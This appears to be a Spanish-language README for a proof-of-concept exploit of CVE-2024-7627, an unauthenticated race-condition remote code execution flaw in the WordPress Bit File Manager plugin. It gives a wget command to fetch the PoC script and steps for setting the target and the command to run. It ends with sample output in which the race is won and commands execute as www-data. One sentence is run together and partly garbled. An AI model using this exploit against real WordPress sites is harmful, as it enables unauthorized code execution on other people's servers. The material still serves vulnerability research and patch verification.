
Script de prueba de concepto para el plugin de WordPress Bit File Manager versión 6.0 - 6.5.5: vulnerabilidad de ejecución remota de código no autenticada mediante condición de carrera (CVE-2024-7627)
Este script de Prueba de Concepto (PoC) es para el plugin de WordPress Bit File Manager versión 6.0 - 6.5.5, que presenta una vulnerabilidad de Ejecución Remota de Código no autenticada mediante Condición de Carrera (CVE-2024-7627).
Descripción:
El plugin Bit File Manager para WordPress es vulnerable a la Ejecución Remota de Código en las versiones 6.0 a 6.5.5 a través de la función 'checkSyntax'. Esto se debe a que escribe un archivo temporal en un directorio de acceso público antes de realizar la validación del archivo. Esto hace posible que atacantes no autenticados ejecuten código en el servidor si un administrador ha permitido permisos de lectura para Usuarios Invitados. (De https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager/bit-file-manager-60-655-unauthenticated-remote-code-execution-via-race-condition)
wget https://raw.githubusercontent.com/siunam321/CVE-2024-7627-PoC/main/poc.py
file-manager deben haber sido configurados previamente por el administradorActualice targetBaseUrl, fileManagerPostPath y/o commandToExecute del script de Python poc.py al valor deseado. Luego, ejecute python3 poc.py para ejecutar el script PoC.
Salida de ejemplo:
└> python3 poc.py
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: f3128b289e
[*] Getting a random file's hash via elFinder command "open"...
[+] Found file "wp-config-sample.php" with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA"!
[*] Editing file with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA" via elFinder command "put" and getting the edited temporary PHP file at "http://localhost/wp-content/uploads/file-managertemp.php"...
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[+] We won the race condition! Here's the PHP payload result:
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
8d3b2776e8a6